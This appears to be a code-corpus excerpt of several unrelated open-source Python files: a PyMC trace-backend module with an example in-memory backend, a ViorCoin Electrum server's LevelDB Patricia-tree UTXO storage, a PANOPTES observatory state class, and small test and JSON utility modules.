- close: This method is called following sampling and should perform any
actions necessary for finalizing and cleaning up the backend.
The base storage class `backends.base.BaseTrace` provides common model
setup that is used by all the PyMC backends.
Several selection methods must also be defined:
- get_values: This is the core method for selecting values from the
backend. It can be called directly and is used by __getitem__ when the
backend is indexed with a variable name or object.
- _slice: Defines how the backend returns a slice of itself. This
is called if the backend is indexed with a slice range.
- point: Returns values for each variable at a single iteration. This is
called if the backend is indexed with a single integer.
- __len__: This should return the number of draws (for the highest chain
number).
When `pymc.sample` finishes, it wraps all trace objects in a MultiTrace
object that provides a consistent selection interface for all backends.
If the traces are stored on disk, then a `load` function should also be
defined that returns a MultiTrace object.
For specific examples, see pymc.backends.{ndarray,text,sqlite}.py.
"""
from ..backends.ndarray import NDArray
from ..backends.text import Text
from ..backends.sqlite import SQLite
_shortcuts = {'text': {'backend': Text,
'name': 'mcmc'},
'sqlite': {'backend': SQLite,
'name': 'mcmc.sqlite'}}
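# ---------------------------------------------------------------------------
# Illustrative sketch (editorial addition, not part of the original module):
# a minimal in-memory backend following the "Writing custom backends" notes
# in the module docstring. It assumes `base.BaseTrace` exposes `self.varnames`
# (as the NDArray backend relies on); constructor details and `_slice` are
# left to the real base class, so treat this as a schematic, not a drop-in.
# ---------------------------------------------------------------------------
from ..backends import base


class ListTrace(base.BaseTrace):
    """Store sampled values in plain Python lists (illustration only)."""

    def setup(self, draws, chain):
        # called once before sampling with the draw count and chain number
        self.chain = chain
        self.samples = {name: [] for name in self.varnames}

    def record(self, point):
        # `point` maps variable names to the values of the current draw
        for name in self.samples:
            self.samples[name].append(point[name])

    def close(self):
        # nothing to finalize for an in-memory store
        pass

    def get_values(self, varname, burn=0, thin=1):
        return self.samples[varname][burn::thin]

    def point(self, idx):
        return {name: values[idx] for name, values in self.samples.items()}

    def __len__(self):
        return len(next(iter(self.samples.values()))) if self.samples else 0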
|
nmmarquez/pymc
|
pymc3/backends/__init__.py
|
Python
|
apache-2.0
| 4,193
|
import plyvel
import ast
import hashlib
import os
import sys
from processor import print_log, logger
from utils import bc_address_to_hash_160, hash_160_to_pubkey_address, hex_to_int, int_to_hex, Hash
global GENESIS_HASH
GENESIS_HASH = '0000074a757ce334e850ff46a695b96d4dc44ccdd0f6860f5c34c49ef9005dcc'
"""
Patricia tree for hashing unspents
"""
DEBUG = 0
KEYLENGTH = 20 + 32 + 4 #56
class Storage(object):
def __init__(self, config, shared, test_reorgs):
self.dbpath = config.get('leveldb', 'path')
if not os.path.exists(self.dbpath):
os.mkdir(self.dbpath)
self.pruning_limit = config.getint('leveldb', 'pruning_limit')
self.shared = shared
self.hash_list = {}
self.parents = {}
self.test_reorgs = test_reorgs
try:
self.db_utxo = plyvel.DB(os.path.join(self.dbpath,'utxo'), create_if_missing=True, compression=None)
self.db_addr = plyvel.DB(os.path.join(self.dbpath,'addr'), create_if_missing=True, compression=None)
self.db_hist = plyvel.DB(os.path.join(self.dbpath,'hist'), create_if_missing=True, compression=None)
self.db_undo = plyvel.DB(os.path.join(self.dbpath,'undo'), create_if_missing=True, compression=None)
except:
logger.error('db init', exc_info=True)
self.shared.stop()
self.db_version = 3 # increase this when database needs to be updated
try:
self.last_hash, self.height, db_version = ast.literal_eval(self.db_undo.get('height'))
print_log("Database version", self.db_version)
print_log("Blockchain height", self.height)
except:
print_log('initializing database')
self.height = 0
self.last_hash = GENESIS_HASH
db_version = self.db_version
# write root
self.put_node('', {})
# check version
if self.db_version != db_version:
print_log("Your database '%s' is deprecated. Please create a new database"%self.dbpath)
self.shared.stop()
return
# compute root hash
d = self.get_node('')
self.root_hash, v = self.get_node_hash('',d,None)
print_log("UTXO tree root hash:", self.root_hash.encode('hex'))
print_log("Coins in database:", v)
# convert between bitcoin addresses and 20 bytes keys used for storage.
def address_to_key(self, addr):
return bc_address_to_hash_160(addr)
def key_to_address(self, addr):
return hash_160_to_pubkey_address(addr)
def get_proof(self, addr):
key = self.address_to_key(addr)
i = self.db_utxo.iterator(start=key)
k, _ = i.next()
p = self.get_path(k)
p.append(k)
out = []
for item in p:
v = self.db_utxo.get(item)
out.append((item.encode('hex'), v.encode('hex')))
return out
def get_balance(self, addr):
key = self.address_to_key(addr)
i = self.db_utxo.iterator(start=key)
k, _ = i.next()
if not k.startswith(key):
return 0
p = self.get_parent(k)
d = self.get_node(p)
letter = k[len(p)]
return d[letter][1]
def listunspent(self, addr):
key = self.address_to_key(addr)
if key is None:
raise BaseException('Invalid ViorCoin address', addr)
out = []
for k, v in self.db_utxo.iterator(start=key):
if not k.startswith(key):
break
if len(k) == KEYLENGTH:
txid = k[20:52].encode('hex')
txpos = hex_to_int(k[52:56])
h = hex_to_int(v[8:12])
v = hex_to_int(v[0:8])
out.append({'tx_hash': txid, 'tx_pos':txpos, 'height': h, 'value':v})
out.sort(key=lambda x:x['height'])
return out
def get_history(self, addr):
out = []
o = self.listunspent(addr)
for item in o:
out.append((item['tx_hash'], item['height']))
h = self.db_hist.get(addr)
while h:
item = h[0:80]
h = h[80:]
txi = item[0:32].encode('hex')
hi = hex_to_int(item[36:40])
txo = item[40:72].encode('hex')
ho = hex_to_int(item[76:80])
out.append((txi, hi))
out.append((txo, ho))
# sort
out.sort(key=lambda x:x[1])
# uniqueness
out = set(out)
return map(lambda x: {'tx_hash':x[0], 'height':x[1]}, out)
def get_address(self, txi):
return self.db_addr.get(txi)
def get_undo_info(self, height):
s = self.db_undo.get("undo_info_%d" % (height % 100))
if s is None: print_log("no undo info for ", height)
return eval(s)
def write_undo_info(self, height, bitcoind_height, undo_info):
if height > bitcoind_height - 100 or self.test_reorgs:
self.db_undo.put("undo_info_%d" % (height % 100), repr(undo_info))
def common_prefix(self, word1, word2):
max_len = min(len(word1),len(word2))
for i in range(max_len):
if word2[i] != word1[i]:
index = i
break
else:
index = max_len
return word1[0:index]
def put_node(self, key, d, batch=None):
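# Serialization: a 32-byte bitmap marking which of the 256 child characters
# are present, followed by one 40-byte record (32-byte hash + 8-byte value)
# per present child, in character order.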
k = 0
serialized = ''
for i in range(256):
if chr(i) in d.keys():
k += 1<<i
h, v = d[chr(i)]
if h is None: h = chr(0)*32
vv = int_to_hex(v, 8).decode('hex')
item = h + vv
assert len(item) == 40
serialized += item
k = "0x%0.64X" % k # 32 bytes
k = k[2:].decode('hex')
assert len(k) == 32
out = k + serialized
if batch:
batch.put(key, out)
else:
self.db_utxo.put(key, out)
def get_node(self, key):
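# Inverse of put_node: decode the 32-byte child bitmap, then read one
# 40-byte (hash, value) record per set bit.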
s = self.db_utxo.get(key)
if s is None:
return
#print "get node", key.encode('hex'), len(key), s.encode('hex')
k = int(s[0:32].encode('hex'), 16)
s = s[32:]
d = {}
for i in range(256):
if k % 2 == 1:
_hash = s[0:32]
value = hex_to_int(s[32:40])
d[chr(i)] = (_hash, value)
s = s[40:]
k = k/2
#cache
return d
def add_address(self, target, value, height):
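# Insert a leaf (20-byte address hash + 32-byte txid + 4-byte output index)
# into the Patricia tree, splitting an existing node where prefixes diverge,
# then schedule hash updates along the traversed path.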
assert len(target) == KEYLENGTH
word = target
key = ''
path = [ '' ]
i = self.db_utxo.iterator()
while key != target:
items = self.get_node(key)
if word[0] in items.keys():
i.seek(key + word[0])
new_key, _ = i.next()
if target.startswith(new_key):
# add value to the child node
key = new_key
word = target[len(key):]
if key == target:
break
else:
assert key not in path
path.append(key)
else:
# prune current node and add new node
prefix = self.common_prefix(new_key, target)
index = len(prefix)
## get hash and value of new_key from parent (if it's a leaf)
if len(new_key) == KEYLENGTH:
parent_key = self.get_parent(new_key)
parent = self.get_node(parent_key)
z = parent[ new_key[len(parent_key)] ]
self.put_node(prefix, { target[index]:(None,0), new_key[index]:z } )
else:
# if it is not a leaf, update the hash of new_key because skip_string changed
h, v = self.get_node_hash(new_key, self.get_node(new_key), prefix)
self.put_node(prefix, { target[index]:(None,0), new_key[index]:(h,v) } )
path.append(prefix)
self.parents[new_key] = prefix
break
else:
assert key in path
items[ word[0] ] = (None,0)
self.put_node(key,items)
break
# write
s = (int_to_hex(value, 8) + int_to_hex(height,4)).decode('hex')
self.db_utxo.put(target, s)
# the hash of a node is the txid
_hash = target[20:52]
self.update_node_hash(target, path, _hash, value)
def update_node_hash(self, node, path, _hash, value):
c = node
for x in path[::-1]:
self.parents[c] = x
c = x
self.hash_list[node] = (_hash, value)
def update_hashes(self):
nodes = {} # nodes to write
for i in range(KEYLENGTH, -1, -1):
for node in self.hash_list.keys():
if len(node) != i: continue
node_hash, node_value = self.hash_list.pop(node)
# for each node, compute its hash, send it to the parent
if node == '':
self.root_hash = node_hash
self.root_value = node_value
break
parent = self.parents[node]
# read parent.. do this in add_address
d = nodes.get(parent)
if d is None:
d = self.get_node(parent)
assert d is not None
letter = node[len(parent)]
assert letter in d.keys()
if i != KEYLENGTH and node_hash is None:
d2 = self.get_node(node)
node_hash, node_value = self.get_node_hash(node, d2, parent)
assert node_hash is not None
# write new value
d[letter] = (node_hash, node_value)
nodes[parent] = d
# iterate
grandparent = self.parents[parent] if parent != '' else None
parent_hash, parent_value = self.get_node_hash(parent, d, grandparent)
self.hash_list[parent] = (parent_hash, parent_value)
# batch write modified nodes
batch = self.db_utxo.write_batch()
for k, v in nodes.items():
self.put_node(k, v, batch)
batch.write()
# cleanup
assert self.hash_list == {}
self.parents = {}
def get_node_hash(self, x, d, parent):
# a node's hash covers its skip string plus the concatenated child hashes;
# its value is the sum of the child values
if x != '':
skip_string = x[len(parent)+1:]
else:
skip_string = ''
d2 = sorted(d.items())
values = map(lambda x: x[1][1], d2)
hashes = map(lambda x: x[1][0], d2)
value = sum( values )
_hash = self.hash( skip_string + ''.join(hashes) )
return _hash, value
def get_path(self, target):
word = target
key = ''
path = [ '' ]
i = self.db_utxo.iterator(start='')
while key != target:
i.seek(key + word[0])
try:
new_key, _ = i.next()
is_child = new_key.startswith(key + word[0])
except StopIteration:
is_child = False
if is_child:
if target.startswith(new_key):
# add value to the child node
key = new_key
word = target[len(key):]
if key == target:
break
else:
assert key not in path
path.append(key)
else:
print_log('not in tree', self.db_utxo.get(key+word[0]), new_key.encode('hex'))
return False
else:
assert key in path
break
return path
def delete_address(self, leaf):
path = self.get_path(leaf)
if path is False:
print_log("addr not in tree", leaf.encode('hex'), self.key_to_address(leaf[0:20]), self.db_utxo.get(leaf))
raise
s = self.db_utxo.get(leaf)
self.db_utxo.delete(leaf)
if leaf in self.hash_list:
self.hash_list.pop(leaf)
parent = path[-1]
letter = leaf[len(parent)]
items = self.get_node(parent)
items.pop(letter)
# remove key if it has a single child
if len(items) == 1:
letter, v = items.items()[0]
self.db_utxo.delete(parent)
if parent in self.hash_list:
self.hash_list.pop(parent)
# we need the exact length for the iteration
i = self.db_utxo.iterator()
i.seek(parent+letter)
k, v = i.next()
# note: k is not necessarily a leaf
if len(k) == KEYLENGTH:
_hash, value = k[20:52], hex_to_int(v[0:8])
else:
_hash, value = None, None
self.update_node_hash(k, path[:-1], _hash, value)
else:
self.put_node(parent, items)
_hash, value = None, None
self.update_node_hash(parent, path[:-1], _hash, value)
return s
def get_children(self, x):
i = self.db_utxo.iterator()
l = 0
while l <256:
i.seek(x+chr(l))
k, v = i.next()
if k.startswith(x+chr(l)):
yield k, v
l += 1
elif k.startswith(x):
yield k, v
l = ord(k[len(x)]) + 1
else:
break
def get_parent(self, x):
""" return parent and skip string"""
i = self.db_utxo.iterator()
for j in range(len(x)):
p = x[0:-j-1]
i.seek(p)
k, v = i.next()
if x.startswith(k) and x!=k:
break
else: raise
return k
def hash(self, x):
if DEBUG: return "hash("+x+")"
return Hash(x)
def get_root_hash(self):
return self.root_hash
def close(self):
self.db_utxo.close()
self.db_addr.close()
self.db_hist.close()
self.db_undo.close()
def add_to_history(self, addr, tx_hash, tx_pos, value, tx_height):
key = self.address_to_key(addr)
txo = (tx_hash + int_to_hex(tx_pos, 4)).decode('hex')
# write the new history
self.add_address(key + txo, value, tx_height)
# backlink
self.db_addr.put(txo, addr)
def revert_add_to_history(self, addr, tx_hash, tx_pos, value, tx_height):
key = self.address_to_key(addr)
txo = (tx_hash + int_to_hex(tx_pos, 4)).decode('hex')
# delete
self.delete_address(key + txo)
# backlink
self.db_addr.delete(txo)
def get_utxo_value(self, addr, txi):
key = self.address_to_key(addr)
leaf = key + txi
s = self.db_utxo.get(leaf)
value = hex_to_int(s[0:8])
return value
def set_spent(self, addr, txi, txid, index, height, undo):
key = self.address_to_key(addr)
leaf = key + txi
s = self.delete_address(leaf)
value = hex_to_int(s[0:8])
in_height = hex_to_int(s[8:12])
undo[leaf] = value, in_height
# delete backlink txi-> addr
self.db_addr.delete(txi)
# add to history
s = self.db_hist.get(addr)
if s is None: s = ''
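# Each history record is 80 bytes: funding outpoint (32-byte txid + 4-byte
# index), 4-byte funding height, then the spending txid (32 bytes), 4-byte
# input index and 4-byte spending height.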
txo = (txid + int_to_hex(index,4) + int_to_hex(height,4)).decode('hex')
s += txi + int_to_hex(in_height,4).decode('hex') + txo
s = s[ -80*self.pruning_limit:]
self.db_hist.put(addr, s)
def revert_set_spent(self, addr, txi, undo):
key = self.address_to_key(addr)
leaf = key + txi
# restore backlink
self.db_addr.put(txi, addr)
v, height = undo.pop(leaf)
self.add_address(leaf, v, height)
# revert add to history
s = self.db_hist.get(addr)
# s might be empty if pruning limit was reached
if not s:
return
assert s[-80:-44] == txi
s = s[:-80]
self.db_hist.put(addr, s)
def import_transaction(self, txid, tx, block_height, touched_addr):
undo = { 'prev_addr':[] } # contains the list of pruned items for each address in the tx; also, 'prev_addr' is a list of prev addresses
prev_addr = []
for i, x in enumerate(tx.get('inputs')):
txi = (x.get('prevout_hash') + int_to_hex(x.get('prevout_n'), 4)).decode('hex')
addr = self.get_address(txi)
if addr is not None:
self.set_spent(addr, txi, txid, i, block_height, undo)
touched_addr.add(addr)
prev_addr.append(addr)
undo['prev_addr'] = prev_addr
# here I add only the outputs to history; maybe I want to add inputs too (that's in the other loop)
for x in tx.get('outputs'):
addr = x.get('address')
if addr is None: continue
self.add_to_history(addr, txid, x.get('index'), x.get('value'), block_height)
touched_addr.add(addr)
return undo
def revert_transaction(self, txid, tx, block_height, touched_addr, undo):
#print_log("revert tx", txid)
for x in reversed(tx.get('outputs')):
addr = x.get('address')
if addr is None: continue
self.revert_add_to_history(addr, txid, x.get('index'), x.get('value'), block_height)
touched_addr.add(addr)
prev_addr = undo.pop('prev_addr')
for i, x in reversed(list(enumerate(tx.get('inputs')))):
addr = prev_addr[i]
if addr is not None:
txi = (x.get('prevout_hash') + int_to_hex(x.get('prevout_n'), 4)).decode('hex')
self.revert_set_spent(addr, txi, undo)
touched_addr.add(addr)
assert undo == {}
|
ROIV/ViorCoin-ElectrumServer
|
src/storage.py
|
Python
|
agpl-3.0
| 18,187
|
"""@package panoptes.state.states.sleeping
The sleeping state happens during the day, after components have been
connected, while we are waiting for darkness.
From the sleeping state you can go to parking and getting ready. Moving to
parking state should be triggered by bad weather. Moving to getting ready
state should be triggered by timing. At a user configured time (i.e. at
the end of twilight), the system will go to getting ready.
In sleeping state:
- it is: day
- camera connected: yes
- camera cooling: no
- camera cooled: N/A
- camera exposing: no
- mount connected: yes
- mount tracking: no
- mount slewing: no
- mount parked: yes
- weather: N/A
- target chosen: N/A
- test image taken: N/A
- target completed: N/A
- analysis attempted: N/A
- analysis in progress: N/A
- astrometry solved: N/A
- levels determined: N/A
Timeout Condition: This state does not have a formal timeout, but should
check to see if it is night as this state should not happen during night.
"""
from panoptes.state import state
class Sleeping(state.PanoptesState):
def setup(self, *args, **kwargs):
self.outcomes = ['ready']
def run(self):
try:
self.logger.info("Turning on camera cooler.")
# self.camera.set_cooling(True)
self.outcome = 'ready'
except:
self.logger.critical("Camera not responding to set cooling. Parking.")
self.logger.info("Conditions are now dark, moving to getting ready state.")
return self.outcome
|
Guokr1991/POCS
|
panoptes/state/states/sleeping.py
|
Python
|
mit
| 1,617
|
"""Tests for the JuiceNet component."""
|
nkgilley/home-assistant
|
tests/components/juicenet/__init__.py
|
Python
|
apache-2.0
| 40
|
# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from . import caffe_train
from digits import test_utils
def test_caffe_imports():
test_utils.skipIfNotFramework('caffe')
import numpy
import google.protobuf
|
TimZaman/DIGITS
|
digits/model/tasks/test_caffe_train.py
|
Python
|
bsd-3-clause
| 281
|
import os
import json
import numpy
from chainer import cuda
class JSONEncoderEX(json.JSONEncoder):
"""Ref: https://stackoverflow.com/questions/27050108/convert-numpy-type-to-python"""
def default(self, obj):
if isinstance(obj, numpy.integer):
return int(obj)
elif isinstance(obj, numpy.floating):
return float(obj)
elif isinstance(obj, numpy.ndarray):
return obj.tolist()
elif isinstance(obj, cuda.ndarray):
return cuda.to_cpu(obj).tolist()
else:
return super(JSONEncoderEX, self).default(obj)
def save_json(filepath, params, ignore_error=True):
"""save params in json format.
Args:
filepath (str): filepath to save args
params (dict or list): args to be saved
ignore_error (bool): if True, exceptions are ignored and an error log
is printed, so a failed save does not stop the program
"""
try:
with open(filepath, 'w') as f:
json.dump(params, f, indent=4, cls=JSONEncoderEX)
except Exception as e:
if not ignore_error:
raise e
else:
print('[WARNING] Error occurred at save_json, but ignoring...')
print('The file {} may not be saved.'.format(filepath))
print(e)
def load_json(filepath):
"""load params, whicch is stored in json format.
Args:
filepath (str): filepath to save args
Returns (dict or list): params
"""
with open(filepath, 'r') as f:
params = json.load(f)
return params
if __name__ == '__main__':
import chainerex.utils as cl
# Demo
# Please remove 'result' directory, which contains 'args' file, after demo.
args = {
'a_int': 1,
'b_str': 'string',
'c_list': [1, 2, 3],
'd_tuple': (1, 2),
'n_int_scalar': numpy.array(1),
'n_int_array': numpy.array([1]),
'n_float': numpy.array([[1.0, 2.0], [3.0, 4.0]]),
}
out_dir = cl.create_timedir()
filepath = os.path.join(out_dir, 'args')
cl.save_json(filepath, args)
# # Add additional information, it also work.
# args.update({'e': 'ext_info'})
# cl.save_json(os.path.join(out_dir, 'args'), args)
load_args = load_json(filepath)
print(type(load_args), load_args)
|
corochann/chainerex
|
chainerex/utils/log.py
|
Python
|
mit
| 2,306
|